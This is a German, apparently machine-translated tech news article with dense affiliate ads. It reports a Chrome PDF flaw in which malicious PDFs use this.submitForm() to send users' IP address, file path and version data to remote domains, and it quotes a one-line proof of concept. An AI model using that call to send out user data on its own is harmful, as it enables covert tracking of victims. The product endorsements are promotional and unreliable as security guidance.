Chrome-Bug lässt Hacker Benutzerdaten über PDF-Dateien sammeln

How to effectively deal with bots on your site? The best protection against click fraud.
  • EdgeSpot hat eine faszinierende Zero-Day-Sicherheitslücke entdeckt, die PDF-Dokumente in Chrome ausnutzt.
  • Diese Verletzlichkeit kann Ihnen schaden, indem Sie die sensiblen Daten auf Ihrem PC sammeln.
  • Entdecken Sie unsere Web- und Cloud-Seite für weitere Einblicke in andere Tools und Dienste.
  • Wenn Sie sich für Browser interessieren, informieren wir Sie in unserem Browser-Hub.
Durch den Chrome-Bug können Hacker Benutzerdaten aus Ihren PDF-Dateien sammeln
Wie wäre es mit dem besten Dokumentenmanager?
Machen Sie alle Ihre Dokumente mit dem Adobe Acrobat Reader zugänglich und sicher. Mit diesem Dokumentenmanagement-Tool können Sie auch elektronische Formulare unterschreiben und offizielle Formulare erstellen, um Ihre Zeit bei der Arbeit zu sparen. Holen Sie es für Ihren PC und Sie können:
  • Öffnen, drucken und bearbeiten Sie alle Ihre PDF- und anderen Dateitypen
  • PDF-Formulare einfacher ausfüllen
  • Halten Sie Ihre wichtigen Dokumente verschlüsselt

Holen Sie sich alle Apps zum Sonderpreis!

Die weltweit führende Dokumentenmanagement-Software ist jetzt zu einem günstigen Preis erhältlich, also beeilen Sie sich!

instagram story viewer

Der Exploit-Erkennungsdienst EdgeSpot hat ein faszinierendes Chrom Zero-Day-Schwachstelle, die PDF-Dokumente ausnutzt.

Die Schwachstelle ermöglicht es Angreifern, sensible Daten sammeln mit bösartigen PDF-Dokumenten, die in Chrome geöffnet wurden.

Sobald das Opfer die entsprechenden PDF-Dateien in Google Chrome öffnet, beginnt im Hintergrund ein Schadprogramm zu arbeiten, indem es Nutzerdaten sammelt.

Die Daten werden dann an den Remote-Server weitergeleitet, der von den Hackern kontrolliert wird. Sie fragen sich vielleicht, welche Daten von den Angreifern angesaugt werden, sie zielen auf die folgenden Daten auf Ihrem PC ab:

  • IP Adresse
  • Vollständiger Pfad der PDF-Datei auf dem System
  • OS- und Chrome-Versionen

Vorsicht vor Malware-verseuchten PDF-Dateien

Experten gesichtet dass eine der beiden Domänen readnotify[.]com oder burpcollaborator[.]net erhielt die Daten.

Sie enthüllten, dass die Angreifer die this.submitForm() PDF-JavaScript-API zum Sammeln der sensiblen Informationen der Benutzer.

Wir haben es mit einem minimalen PoC getestet, einem einfachen API-Aufruf wie this.submitForm(‘ http://google.com/test’) veranlasst Google Chrome, die personenbezogenen Daten an google.com zu senden.

Dieser Chrome-Bug wurde von zwei verschiedenen Gruppen bösartiger PDF-Dateien ausgenutzt, die beide im Oktober 2017 bzw. September 2018 im Umlauf waren.

Insbesondere können die gesammelten Daten von den Angreifern verwendet werden, um zukünftige Angriffe zu verfeinern. Berichten zufolge wurde der erste Stapel von Dateien mit dem PDF-Tracking-Dienst von ReadNotify kompiliert.

Benutzer können den Dienst nutzen, um Benutzeransichten zu verfolgen. EdgeSpot hat keine Details zur Beschaffenheit des zweiten Satzes von PDF-Dateien mitgeteilt.

Kurzer Tipp: Ändern Sie Ihren Browser auf Opera

In diesen unruhigen Zeiten werden wir bei jedem Schritt mit Malware, Phishing und Trojanern angegriffen, daher müssen wir viel wachsamer sein und geschützt bleiben.

Da dies ein Chrome-spezifisches Problem ist, können Sie diese und alle anderen Bedrohungen mit einem sicherheitsorientierten Browser wie. vermeiden Oper.

Dieser Browser verfügt über einen integrierten Werbeblocker, der solche Ablenkungen nicht nur beseitigt, sondern auch blockiert Analyseskripte, Tracking-Pixel und Methoden zum Sammeln Ihrer Daten.

Und wenn Sie absolut sicher sein wollen, dass Sie sich von jeder Gefahr fernhalten, gehen Sie hinter das eingebaute VPN Service, der für unbegrenzte Zeit zu 100% kostenlos genutzt werden kann.

Oper

Oper

Opera bietet mit dem integrierten Werbeblocker und dem kostenlosen VPN-Dienst den perfekten Schutz vor Bedrohungen!

Kostenlos bekommen
Besuche die Website

Wie kann ich vor PDF-Schwachstellen geschützt bleiben?

Adobe Acrobat PRO herunterladen

Adobe Acrobat PRO

Adobe und Chrome passen gut zusammen, wenn es um den Umgang mit PDF-Dateien geht. Durch die Installation der Adobe-Erweiterung für Chrome können Sie PDFs nach Ihren Wünschen überprüfen und bearbeiten, ohne Ihren bevorzugten Browser zu verlassen.

Trotz seiner robusten Struktur wird in PDF-Dateien versteckte Malware möglicherweise nicht erkannt, wenn Sie die Standardversion des Readers verwenden.

Die professionelle Version wird empfohlen, um Ihren Schutz zu gewährleisten und Ihre Daten von Hackern fernzuhalten.

Obwohl es nicht kostenlos ist, ist der Preis, den Sie zahlen müssen, für die Fülle an zusätzlichen Funktionen, die Sie genießen werden, einschließlich der verbesserten Sicherheit Ihrer PDF-Dateien, eher gering.

Es ist auch eine kostenlose 7-Tage-Testversion enthalten, damit Sie vor dem Kauf einen Vorgeschmack auf das gesamte Pro-Erlebnis bekommen.

Adobe Acrobat PRO

Adobe Acrobat PRO

Halten Sie sich von Malware fern, indem Sie Adobe Acrobat PRO herunterladen. Es hat viel mehr Funktionen als die kostenlose Version und schützt Ihre Daten.

Kostenlose Testphase
Besuche die Website

Wenn Sie beim Surfen im Internet sicher sein möchten, benötigen Sie ein vollwertiges Tool zur Sicherung Ihres Netzwerks. Jetzt privaten Internetzugang installieren und sichern Sie sich. Es schützt Ihren PC vor Angriffen beim Surfen, maskiert Ihre IP-Adresse und blockiert alle unerwünschten Zugriffe.

Der Exploit-Erkennungsdienst EdgeSpot wollte die Chrome-Benutzer auf die möglichen Risiken aufmerksam machen, da mit einer Veröffentlichung des Patches in naher Zukunft nicht zu rechnen war.

EdgeSpot hat Google im vergangenen Jahr über die Sicherheitslücke berichtet und das Unternehmen versprach, Ende April einen Patch zu veröffentlichen.

Sie können das Problem jedoch vorübergehend umgehen, indem Sie die empfangenen PDF-Dokumente lokal mit einer anderen Reader-App anzeigen.

Alternativ können Sie Ihre PDF-Dokumente auch in Chrome öffnen, indem Sie Ihre Systeme vom Internet trennen.

Häufig gestellte Fragen

  • Ja tut es. Wenn Sie jedoch eine breitere Auswahl wünschen, Entdecken Sie unsere Top-Picks für ChromPrivatsphäre Erweiterungen in diese komplette Anleitung.

  • THier sind viele Erweiterungen, die es ermöglichen PDFs wird bearbeitet. Prüfen aus unserer ausgezeichneter Führer über die besten PDF-Erweiterungen für Chrome.

  • Es tut es nicht, aber Sie können es schnell aktivieren. Hier ist unser umfassende Anleitung Informationen zum Aktivieren des QR-Code-Generators in Chrome.

Teachs.ru
5+ beste Microsoft Word Antivirus-Tools zum Schutz von Dokumenten

5+ beste Microsoft Word Antivirus-Tools zum Schutz von DokumentenMicrosoft Word ProblemeOnlinesicherheit

Zeitsparendes Software- und Hardware-Know-how, das jährlich 200 Millionen Benutzern hilft. Wir führen Sie mit Anleitungen, Neuigkeiten und Tipps, um Ihr technisches Leben zu verbessern.Eset NOD32 s...

Weiterlesen
5+ beste Sicherheitssoftware für kleine Unternehmen [2021 Liste]

5+ beste Sicherheitssoftware für kleine Unternehmen [2021 Liste]AntivirusGeschäfts SoftwareOnlinesicherheit

Jedes Unternehmen sollte seine wichtigen Daten durch den Einsatz von Sicherheitssoftware für kleine Unternehmen schützen.Die Produkte von ESET sind die besten Tools, die Sie in diesem Bereich erhal...

Weiterlesen
5+ beste SaaS-Endpoint-Schutz-Tools für Windows 10

5+ beste SaaS-Endpoint-Schutz-Tools für Windows 10SaasOnlinesicherheitEndpunktsicherheit

Zeitsparendes Software- und Hardware-Know-how, das jährlich 200 Millionen Benutzern hilft. Wir führen Sie mit Anleitungen, Neuigkeiten und Tipps, um Ihr technisches Leben zu verbessern.Diese SaaS-E...

Weiterlesen
ig stories viewer